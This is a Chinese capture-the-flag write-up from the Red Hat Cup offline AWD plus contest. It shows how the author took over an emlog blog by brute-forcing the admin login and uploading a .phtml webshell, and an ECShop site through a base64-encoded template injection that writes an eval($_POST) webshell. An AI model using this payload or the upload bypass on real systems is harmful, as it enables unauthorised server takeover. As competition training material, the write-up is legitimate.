红帽杯线下AWD plus writeup

admin 2023年5月15日09:52:28评论50 views字数 678阅读2分15秒阅读模式

粤湾期货


访问是一个由emlog的博客站点。

 

红帽杯线下AWD plus writeup


直接访问后台得知存在admin用户对admin进行暴力破解

 

红帽杯线下AWD plus writeup



上传附件处限制了文件类型,发现可添加允许添加后缀名。尝试了phpphp5等类似添加后,都会被更改为x类型,最后尝试添加phtml,成功添加。

 

红帽杯线下AWD plus writeup



然后直接去写文章处添加附件,并上传后缀为pthml的一句话

 

红帽杯线下AWD plus writeup


成功上传后,右键附件复制链接地址,上菜刀,成功getshell。并在根目录下找到flag

 

红帽杯线下AWD plus writeup

红帽杯线下AWD plus writeup

 

粤湾租赁


访问web题目,系统为ecshopcms,发现两个登录处,一个是前台登陆,一个是后台登陆,前台登陆并未发现什么可以拿下的点。

 

红帽杯线下AWD plus writeup


已知存在admin用户,进行爆破

 

红帽杯线下AWD plus writeup


ecshop有已知的getshell方法,

直接在模板管理语言项编辑直接修改来写入shell文件搜索关键字:用户信息;用户信息四个字一定不要删除,在之后添加:(base64加密去掉了最后的=)

1.${${fputs(fopen(base64_decode(c2hlbGwucGhw),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2gnXSk7Pz3))}}

 

红帽杯线下AWD plus writeup


而后保存,保存后访问user.php即可在根目录下生成shell.phpshell。然后上菜刀,成功在根目录获得flag

 

红帽杯线下AWD plus writeup


 

 

手握日月摘星辰,安全路上永不止步。

                                                      - Khan攻防安全实验室


本文始发于微信公众号(Khan安全攻防实验室):红帽杯线下AWD plus writeup

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月15日09:52:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红帽杯线下AWD plus writeuphttp://cn-sec.com/archives/536590.html

发表评论

匿名网友 填写信息